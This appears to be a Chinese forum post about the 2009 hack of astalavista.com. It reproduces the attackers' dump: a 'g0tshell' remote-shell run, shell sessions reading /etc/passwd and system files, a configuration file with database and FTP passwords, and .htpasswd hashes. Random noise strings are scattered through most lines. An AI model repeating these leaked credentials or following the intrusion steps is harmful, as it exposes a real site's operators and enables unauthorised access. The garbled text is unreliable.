里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
( N: O K- c( y; T: w7 q
4 Q F- S, q" ], q[root@front3 ~]# curl -I litespeedtech.com
. V- ~6 ]( ~6 {# b, _# OHTTP/1.1 200 OK
# ~. a1 V0 f _0 K& jDate: Fri, 05 Jun 2009 22:54:51 GMT0 x0 J4 Q) m1 P
Server: LiteSpeed& D0 i" g1 k( F% e* @& K3 a7 I5 X
& }6 D/ E, _: I2 X) |8 T
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
/ v% g$ o& H& t4 E! C" ^ B4 t1 h/ t
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
2 @ ?: x* `3 E
' A7 `8 u# @3 P; t. H" c, B1 _/ l, W6 q9 M8 u9 [: x
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ R. j7 \, p3 n: E$ g
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
9 [ `; t/ q) q/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \5 P: C0 k% m1 Q: Q7 y1 z% ?
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /5 E( i5 r9 ~) G0 K( S; G. F! |
\/ \/ \/ \/ \/ \/ \/
, o4 m$ h" ~( n% I, V6 G ]- R! D i The Hacking & Security Community
% _2 }8 m% ~, A) R# l[+] Founded in 1997 by a hacker computer enthusiast
4 p! \% n3 _* ?9 y2 t! ?9 l3 Z[-] Exposed in 2009 by anti-sec group
- k+ C F! X. V+ m$ m* c3 e$ a0 L- o a0 Y0 D. r( M4 f8 C
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:% Y% `1 X) A: ^3 A6 _8 L* l2 k
>> 03. Who’s behind the site?' y2 P! O8 r" u3 U
>>! u7 L2 j4 N. B& c6 Q- `0 q+ V
>> A team of security and IT professionals, and a countless number of contributors from all over the world.- ^0 K+ _5 a: f( b9 W
; J9 w9 O; D7 G7 I7 }6 K>> 05. Is it true that the site is visited by script-kiddies and warez fans only?: G& `( j' S1 o
>>* B3 a1 v4 P$ y
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
; E1 Q+ b% {* q* N0 O T; Xmilitary institutions.# \8 v' ~ J7 |7 t: E
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
8 L5 F# u( R' v' m" f& ? H2 d) z5 P) ~! T+ d5 ~, u3 L
Why has Astalavista been targeted?
1 {; h2 l! Y6 [& S: a Y
/ k# v$ r e5 XOther than the fact that they are not doing any of this for the “community” but
6 }0 K6 a# b/ H3 sfor the money, they spread exploits for kids, claim to be a security community
- `; _4 T$ Z( Z2 u8 O8 F(with no real sense of security on their own servers), and they charge you $6.66, }" a; A: r- `4 f, M7 _
per months to access a dead forum with a directory filled with public releases
& j! K0 i2 y6 T) ?* U+ ^and outdated / broken services.# i7 ?* v" I( `( K* m1 }4 f
- a: U9 N7 G3 O6 B! z+ Z4 TWe wanted to see how good that “team of security and IT professionals” really is.- w/ e9 |6 ^: U9 y y2 n3 N
8 U0 H1 c% Z8 F6 uLet’s begin.6 i& \1 n) g& D6 @7 {7 r' G' [
8 A9 w0 O: ^, O/ N4 y4 nanti-sec:~# ./g0tshell astalavista.com -p 80
. t5 q" S4 K! Q' d9 w# W0 v[+] Connecting to astalavista.com:80: d6 k1 \) L3 m* w" b) W
[+] Grabbing banner…9 b+ J: f8 ]% _* ^5 k
LiteSpeed; E U7 S+ S% e0 L- h6 T* a+ l
[+] Injecting shellcode…* r/ B* b5 D* G: c2 q: ~+ C+ g- U, `
[-] Wait for it4 X! n! R' _' F7 u, o" `$ y
, |# R) \4 E1 P0 N[~] We g0tshell& B) |5 m! F3 n5 ~+ G3 O7 L
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux/ o& b9 g$ v' o+ }: r! }" E
ID: uid=100(apache) gid=500(apache) groups=500(apache)+ x. S% q4 s" {+ q. P! O0 w
, C Q8 r& J. r) `sh-3.2$ cat /etc/passwd
! u) ~' m( o) t x0 U" a; Hroot:x:0:0:root:/root:/bin/bash6 ?0 i4 g+ y( V( N
bin:x:1:1:bin:/bin:/sbin/nologin
( w! n Q& r$ Rdaemon:x:2:2:daemon:/sbin:/sbin/nologin
: m$ M$ D' @/ O" X4 ?) l5 Dadm:x:3:4:adm:/var/adm:/sbin/nologin& {4 l% z% u7 A" f# e) r
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin0 G3 _# \6 w/ Q3 v* t; I
sync:x:5:0:sync:/sbin:/bin/sync
* m! n% i4 Q2 Q5 R8 E* lshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
$ w) q2 [6 P4 S+ D1 G! `halt:x:7:0:halt:/sbin:/sbin/halt
1 U% h( }! M4 R) r! _! email:x:8:12:mail:/var/spool/mail:/sbin/nologin3 f6 F( r! a! a
news:x:9:13:news:/etc/news:
4 K/ o. n, I, W. w! d9 }5 Buucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin9 M6 ]" G D" S4 A/ c g; y; g
operator:x:11:0perator:/root:/sbin/nologin
3 e( f" J% f) K% I7 g, h, Hgames:x:12:100:games:/usr/games:/sbin/nologin2 K3 T- }$ p* x- k; t3 {
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin/ }- s: m& S* k4 w7 A7 k' }
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin" Z* z" m& ] M- u
nobody:x:99:99:Nobody:/:/sbin/nologin
5 ~; S2 {$ o8 s' }/ Crpm:x:37:37::/var/lib/rpm:/sbin/nologin
- N0 O/ L" e# |6 @2 kdbus:x:81:81:System message bus:/:/sbin/nologin3 U2 o# `8 {# C$ i2 ^0 F4 e; j: S" s
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
5 _9 f- r( H- Rmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin# j- N3 `4 [" \$ J C. e
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin1 P! T. U3 n! e- e
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
2 k: Y+ p' L' } Q5 l2 Ehaldaemon:x:68:68:HAL daemon:/:/sbin/nologin' i6 g" @' R; H' N1 \
rpc:x:32:32ortmapper RPC user:/:/sbin/nologin
3 L; E) C" `6 M+ L$ o6 brpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
, ^1 [/ C% u% r* bnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
& j3 G( d- `) r: A5 Q" M$ m/ K7 _sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin- Q9 p; {/ f2 p/ k3 p) @
pcap:x:77:77::/var/arpwatch:/sbin/nologin* W+ U, \+ [7 L
named:x:25:25:Named:/var/named:/sbin/nologin
7 E, L+ k7 z# u; {1 R2 T% {0 Rapache:x:100:500::/var/www:/bin/false
& K, D# N2 ^% p8 M2 m+ N- H" }7 ^8 Ydiradmin:x:101:101::/usr/local/directadmin:/bin/bash
3 _. t+ a9 f) K# L z- o5 @* Wmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash4 l# X7 t: t' M5 V. l" i
webapps:x:500:501::/var/www/html:/bin/bash
( V5 X* d n: I1 g+ K. wmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
" W+ Q9 Q( e: d5 N" cadmin:x:501:502::/home/admin:/bin/bash" i: G& N0 ~6 K7 ^9 U
jon:x:502:503::/home/jon:/bin/bash$ i4 F6 `% w* S4 T7 v7 W
com:x:503:504::/home/com:/bin/bash
5 i: Q% f* l2 \ntp:x:38:38::/etc/ntp:/sbin/nologin
; d# v) H8 p% _% z4 Eais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin: c* |# v7 G8 p- k
astanet:x:504:505::/home/astanet:/bin/bash
* ^& Q5 K+ X- W- n; l- tavahi:x:70:70:Avahi daemon:/:/sbin/nologin. \. N1 p: l( a9 p, r' \
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
, T7 u* C) j4 D8 w6 z9 P) l
$ A" N7 D) Z& G/ \$ ?' W1 v0 Psh-3.2$ cat /etc/hosts
7 G. \4 I9 D8 d& K& w2 {( ~+ x l# Do not remove the following line, or various programs1 C5 C2 q& U: v
# that require network functionality will fail.$ g% c$ p) k8 x. i, u* b4 p$ p
127.0.0.1 localhost.localdomain localhost
% o% d# j6 w+ ^5 r::1 localhost6.localdomain6 localhost66 M q4 _+ f% T
80.74.154.172 asta1.astalavistaserver.com
4 y% U" H7 t( g- I# ^5 M+ h4 e8 d0 c: N
sh-3.2$ pwd" Q( m4 a" o }3 W2 d" T( [
/home/com/public_html
" ]6 y: C/ k8 j% D$ f1 q0 S
- k7 K( G- w' {. Esh-3.2$ ls -la2 b; R# J6 ^. y, V/ ~! p' z
total 18460% C P% q3 x7 s* z# }* f
drwxr-xr-x 30 com apache 4096 May 28 17:06 .
; \) w; R5 c9 X$ zdrwx–x–x 11 com com 4096 Jun 25 2008 ..
/ v1 P$ m* Y! s4 V& }4 X# ~drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin9 V$ P$ s) f% V+ Q3 R& l- W7 ^; ^9 B
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
: l6 G" }: v8 t+ }# zdrwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin4 w. [ S; x9 H/ U# Z
drwxrwxrwx 2 com com 4096 May 19 00:50 config
$ l' d% g0 R, d6 ydrwxr-xr-x 2 com com 4096 Mar 20 11:05 core
: H$ q6 N8 j: K! k- \# o( ddrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
7 l4 M& k5 p" x7 w9 qdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
) Q# A* ], e1 S* L+ h9 u9 p1 @2 \8 jdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo1 u& \% X8 J, A7 C! h" O- W2 p
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__
. d3 \' Q1 T6 X3 t0 R( ` `2 Z-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php
7 v- S" e1 L& j. ydrwxr-xr-x 2 com com 4096 Sep 9 2008 dvd6 J2 g* x& l1 {- j; u. N# s& b5 l
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
- c% m1 V9 j' Q' v" Z. ?% j-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
& @( ~5 `+ Z/ z0 b1 Q) pdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed, ~: w, G0 g+ Y1 T8 T9 @; I4 s
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess* `# r$ V4 [7 v4 c- x( c8 @
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak. `4 I9 Z6 Z u$ Z' H) B
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
# Y4 l6 C# d2 Y+ {drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
) y; J# c9 u# B/ v. xdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images
! l! r) C& }$ S( y3 e-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php: U7 M. p" m( C- _% k3 u
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer8 j: |3 s, b* K/ S' Q v- E
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
' ?$ P0 P9 o+ v2 }! F( z; [drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
& U3 M5 _0 e9 N) R( X! Ndrwxrwxrwx 12 com com 4096 Jun 2 07:47 media. B1 s* j+ J# v7 U
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
: V# f3 q3 a5 v( e. A2 ]drwxr-xr-x 34 com com 4096 May 28 16:30 modules, O; Z, }/ C# |6 ^2 b
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin+ ?8 ] T5 o' b" P
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
' y8 E4 R3 {- e, g5 Z4 Adrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old! z8 G9 T, Q, b4 t6 M- O
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
6 I/ L: L1 S& X9 A2 Q; {, Z9 hdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy' E9 f& e$ e5 q" w
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
' A' C5 ]0 U5 r5 H$ S' ?-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
; k* Y! `, S2 D# I: m1 p. N3 D-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
; P& B( \6 m+ ddrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes$ n$ Y' a9 I' @5 F/ n
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp7 i* A1 W. R4 X% r' Q( l' _
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
5 M$ U9 C8 y1 k# O, X @* r9 d! \' L; b- }5 ^9 T' Q% U5 c
sh-3.2$ head -20 index.php% Z; f! ~+ f, O, r" I
<?php
* m5 @2 E" H6 T8 H8 d/ Q% B* I7 H
/**7 f! l/ ~( I; d/ ]) _5 A3 F
* The main page for the CMS/ \. t! k3 c3 y/ @/ G/ J
* @copyright CONTREXX CMS - COMVATION AG3 l. A& h& Y' ^, [" R
* @author Comvation Development Team
4 Y& ~! E5 t! w' M* @version v1.0.9.10.1 stable) c1 r- D; j/ D- E
* @package contrexx+ V( u, n( R5 S" {
* @subpackage core' L( B) O4 D0 {- I5 _: i
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
7 [+ x+ }! u+ m6 o& X* @since v0.0.0.0
+ V. n& ~ O3 f$ L0 p. J# }+ W* @todo Capitalize all class names in project
' H" l8 |% B8 p+ Q# a0 O* @uses /config/configuration.php
) E& Y3 I' R$ `" M* @uses /config/settings.php
+ ?% k0 `( z. s* @uses /config/version.php- E+ `( @6 ~' R; l
* @uses /core/API.php
! K* S7 W5 f1 E* @uses /core_modules/cache/index.class.php
0 h& z6 w5 R; k% [: ?8 V* @uses /core/error.class.php
' P: J; t2 T K# e0 {* @uses /core_modules/banner/index.class.php+ W9 x* v' t' ?+ m/ h
* @uses /core_modules/contact/index.class.php, T5 T* x V5 M2 Z& e
+ S- d* w; e: F# ?
sh-3.2$ cd config/4 T9 `4 T4 x: r. Y
sh-3.2$ ls -la
* @" }& b: {% r0 z/ Wtotal 32* C( ^- c/ u* d
drwxrwxrwx 2 com com 4096 May 19 00:50 .
0 r* j$ e! K+ D/ k) z# X2 ldrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
3 O* e- `3 s+ a( t-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
$ x9 V4 B2 ]1 L7 L: c-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
! k" X3 x2 m1 M5 B3 N5 \- W-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php( ^7 h; h$ N$ I. L
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php4 Y# W$ t* ]) i8 |/ E$ x
* `1 y4 B& C& a% s+ g
sh-3.2$ cat configuration.php
% \# L' v, n6 e9 T E/ M[snip]
; d" r0 x) H0 G3 O* h& _. B8 q: t$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
7 h5 D1 f% F, i7 U$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
" o0 u$ c0 j% O$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
" p9 w& H( u( D$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username2 S8 |8 o# w2 s# M: R
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password8 i" c3 j0 G, q* h/ t% D9 ~5 R
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)# g' @# x r4 Z6 o6 X# g
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)" |7 _/ B9 q* e3 a$ Z- K3 `) U
[snip]
& v/ u) W. b+ L% y: ]$ Y$ k# f+ ~1 v$_FTPCONFIG['is_activated'] = true; // Ftp support true or false) X- K2 a, ^" n
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
# ~/ r. o+ N8 k) p" H6 s$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost% T1 \2 I* e( E9 r+ D
$_FTPCONFIG['port'] = 21; // Ftp remote port% T4 r- W* l& D2 r* W$ o+ k
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username% h& M4 ~# P. D- q$ b
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
& U8 i2 O* A k6 F1 b' K9 m: a9 M5 L+ y$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
9 j, N5 c# \& L9 T6 p! n1 k- U: C$ z* t9 W/ z+ _- v o( N2 B7 N
sh-3.2$ cd ..' _/ i3 O) y; s( a
sh-3.2$ cd dvd// S4 W: s9 @3 @6 W' V( q+ z
sh-3.2$ ls -la1 a$ e. l" }. c# h
total 2913780
2 O; s% Q8 i/ I+ cdrwxr-xr-x 2 com com 4096 Sep 9 2008 .8 u# @& V3 |( i$ m( j' Z
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
3 t3 A' l. j; k3 h-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar! g2 T/ B6 q/ G, t9 j5 E9 \% |
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar& p. D1 s# G$ |3 M2 m
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
: l( a1 T# U$ ?; r-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess( t9 ^* D$ [5 {2 j9 W. l
% v: A) d4 k% q) Q) i/ y* d$ Psh-3.2$ cat .htaccess6 u- P5 h# G3 M0 X1 W
authType Basic
- u2 S6 O I4 ~: S, E( F& oauthName DVD* [. Y2 u: k0 r+ ]4 z0 F" \; q( U
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd8 Y0 |/ L) T; g
require valid-user
5 g' v3 \6 j* T3 e7 y& v4 G, Q( X, X/ Q3 f* Q- g+ u* B' R
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
+ g0 O5 C9 T2 ^DVDdownload:CRD8cuY6.MPT6. I( h! X" o) n' u7 u1 M6 H
DVDdownload2:CR8a36.wluFMg. q0 |" p0 _4 R2 r+ a1 u5 t. u; J
: o8 Q8 S Q( A! r) }
sh-3.2$ cat test.php
. d1 W+ H0 Y/ t/ i1 j$ s' Q<?php' V! {" y. d" J7 K5 Z
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;; Q; I. r8 j u# y, H4 G( q8 P, N
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));" E1 z# W" Z) c) S4 y7 W! x$ y
echo $url;4 U" {- I# F' q1 h4 ^7 r0 Q: L
?>5 z! {7 ^$ f+ m; V6 A2 G/ K
0 ^, o3 m: L5 S
sh-3.2$ cd modifications/' D1 O4 o; ]( u
sh-3.2$ ls -la6 a$ J' G& Z6 g
total 32
/ H2 B+ ]- P6 T7 @drwxr-xr-x 8 com com 4096 May 11 12:48 ./ h S: \. }4 d1 k7 t
drwxr-xr-x 30 com apache 4096 May 28 17:06 .., U( `2 P; e, s6 P# Y6 N; b
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
. e! E0 f# s1 H" I0 R# O2 ndrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
% I3 ]1 J: C6 X, _, r1 R$ hdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools6 t) q" }) F2 f! o- r1 y
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc5 R4 M# ]3 u# Q0 v s! s5 k6 _2 z
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
5 Y/ [2 Z6 W$ gdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp4 s) C0 T D( Q6 K" z" ^
' q3 a8 `0 w* x6 F
sh-3.2$ ls -R
" }" o; Q, X9 x4 a4 @$ I.:6 O5 _* T. z8 V1 P' u2 a% g( k
com_avtng cronjobs onlinetools pjirc search _tmp9 y% ?- Y1 `) J0 g' [0 ~5 y+ l+ Q
) t4 w# p; w9 K./com_avtng:
$ h# k! N! |" J7 _0 l$ x- k. Javtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
. a8 [2 c- Z- q
$ \' u. K$ @: ?% P) j./com_avtng/scripts:
$ I ^; X( Z9 h5 ?1 Z" O/ @+ tpopunder.js+ c9 R6 N( h. P' B7 K# ]: Z
! {, B1 y( y- J4 C
./cronjobs:
1 z! O, }% Q: I. g5 fexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp1 @2 ~: ?4 Q2 |9 l8 m, y1 e
$ l( I/ W5 J3 T4 t
./cronjobs/tmp:
7 c7 j o7 Y' n/ O4 Rcontrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv( d1 l2 L3 T( h# d% f
/ W; g: ~% L$ W./onlinetools:4 Z: C- x1 H% `. y# X% ~
index.php
|' [0 U! _) \/ S$ ~/ _0 J- D9 L# h; I# ?* k" Z* z
./pjirc:/ V+ L8 Z# G" _* |
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt7 \0 T4 n4 K( w5 P2 p
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt4 A0 Q; Q# q, r2 \: l1 t
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
6 }, R$ E2 m: F8 [
' W" {6 |/ _7 Y& y" u- j./pjirc/img:8 x% Q1 r. K! F H
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
( V9 @% u/ ?9 Q) E) q1 i% varbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif & A+ Z _' _' R
verre-eau.gif0 k% }; F7 V( V7 G1 c) V
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
, [* F5 L: j) Y7 @: e- B- d3 V" ^verre-vin.gif; n: ~ }6 ^! M9 o# r
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
' \% c) R$ ~$ D% Qbiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
" `' y; N8 [8 I4 }( r; X! Z: V+ R1 a
./pjirc/snd:6 N3 e: e: E. \7 R3 j6 \* B
bell2.au ding.au
# n* U( |8 ]& h1 M2 N6 }# ~# W+ O8 M: x! l/ h. M) W! Q$ Q
./search:1 Z$ v1 e6 i: @9 \# G
searchEngines.php search.php% V ?) Q0 _. y3 V( U" w
1 _' B/ V \9 z$ R5 f3 P./_tmp:3 L2 K# k6 a, z/ c7 n' n
defaultPorts.php defaultPorts.txt+ K! [& x9 l; C( |( _3 ^4 G
2 G- x* x: W# `% v( i4 b* h [sh-3.2$ cd cronjobs/% B+ u6 M) E0 u3 L% T
sh-3.2$ cat exploits.php
' A/ o8 T# y! |) j& }5 G* [$ w' v[snip]4 J& ^; G* [. S2 H. Y
$categories = array();
" P+ v9 R8 x+ f' m6 D$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
. l5 t% S- J; V' ^) i$expolits = file($milw0rmFile);; ~. d' W3 s( U P" h0 N% F9 \
$comExploits = array();
7 k9 u; n4 h0 d; m[snip]
- }+ e" w) [" L// manage data
B: E% _3 s0 I, n% P {7 |for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640- H0 Z9 Q% A" w/ R P! @- M. G8 h
8 x+ S& j$ Q' K' j // get path and title! b/ l. z" I' c4 k/ K+ b, t" X2 s" v0 F
$expolits[$x] = trim($expolits[$x]);+ b7 T9 ?2 ]/ i1 I2 [( x
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));$ M2 y1 N1 B/ B2 y& s t$ T
$title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);& {4 [/ K7 A% D. q7 O; P y
- Q8 \4 z. m G0 Y( r$ t x, r // check if file exists
: N( P o0 D3 H7 P7 K1 D* y if (file_exists($path)) {
9 b9 x) ?1 e; y# P A# `- U* e1 i! F/ Z6 l- I. e. h
$text = file_get_contents($path);
) p% E6 Z* ^) [" Z& P2 [' a; \$ O F* ]/ q- z5 i( i
// get content and date+ l: \" m/ S& N6 V y% k
//$text = htmlspecialchars($text, ENT_QUOTES);
8 O1 K' F) d- h, C$ E! X7 S+ D! J $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
9 n# [. O, ], \ if ($tmptext != ”) {; j+ y% A. e" [. Z p
$text = $tmptext;( _/ ^# F3 c0 a4 m$ j" ~, k
} else {4 \' r7 x2 f( X4 q+ G7 U
$text = addslashes(htmlentities($text, ENT_QUOTES));
1 A* V# c) m, X4 W( ^' { }6 ^; w. `+ r' u# l/ P
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));6 r3 V+ y) a% d4 @) u7 ]+ }( }
$tmp = explode('-', $date);
% Y% _; G1 I; E/ p( c0 x$ w $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
( t, D0 Z9 W; J( r4 l# d' d $cat = getCategory ($path);- z, p0 ^9 N* \7 v( c
$ext = pathinfo(basename($path));
/ G/ W0 m; p; q+ K* y) X F% X& M& D $ext = $ext['extension'];
2 q5 l* t+ g. g$ N! n' t( u $qStr = ”
* H* s: B, @7 Z5 B F3 m* p; h SELECT `id`) R9 w0 D( L( }
FROM `contrexx_module_exploits`+ M5 X, f. C! E9 i
WHERE `title` = ‘” . $title . “‘, Z% o* b/ P2 J* H8 R
AND `date` = ‘” . $date . “‘& m" B; u# p; x) ^% ^+ k- b8 G- ^2 K
“;, H; q8 ~" w7 L+ Q, t7 Q7 K
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
- R* o. I. }# G7 L- J3 H% x# P $q = $_objDB->query($qStr);
: m3 w+ H3 Q) y2 l1 w! G! N. @# U4 t9 P: \, C4 e$ X9 @
if ($q->numRows() == 0) {
/ }6 U( H8 i7 ]4 o; B2 g6 b# e: G" s. G' k1 R1 L0 G
// prepare array
a7 Q2 a4 N0 f* B2 J $comExploits[$x]['date'] = $date;
, k9 D2 S, P* L, \) H& v: ?: O $comExploits[$x]['title'] = $title;0 t4 R# o" I {. x9 X/ L
$comExploits[$x]['author'] = ‘milw0rm’;. R0 Q5 ` a: N' }. [5 D9 U7 r! f
$comExploits[$x]['text'] = $text;! Q& a; J: v3 D9 B1 H4 ~# G( u# L
$comExploits[$x]['source'] = $ext;& B- }) Y D1 t9 w8 E
$comExploits[$x]['url1'] = ”;$ [+ M. o4 U; w5 a
$comExploits[$x]['url2'] = ”;4 K' `$ |3 N, S9 |
$comExploits[$x]['catid'] = $cat;
& x1 l8 t3 o2 n, x' w% T* f $comExploits[$x]['lang'] = ‘2′;6 f/ B L, C% m0 ?/ `7 l" X
$comExploits[$x]['userid'] = ‘12′;, O: l/ H4 E( T6 C
$comExploits[$x]['startdate'] = ‘0000-00-00′;
) f& ]0 ?" z" C $comExploits[$x]['enddate'] = ‘0000-00-00′;( b! g3 ?- _0 e7 h% q
$comExploits[$x]['status'] = ‘1′; h, j0 L0 i8 Y% `+ O, _' X
$comExploits[$x]['changelog'] = $date;
$ B% c$ A2 W; u. X* D3 f
: x5 h# }, V0 X5 a4 g }
- X9 C3 m9 p% I; |& L% @[snip]
3 c+ o: X- [, l9 ^& R1 B $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
, y+ D" G/ V, ?9 d$ E9 |<rss version=”2.0″>. A+ S2 M: O y' g
<channel>
* A" r( E2 I$ K6 D <title>ASTALAVISTA.com - Exploits</title>
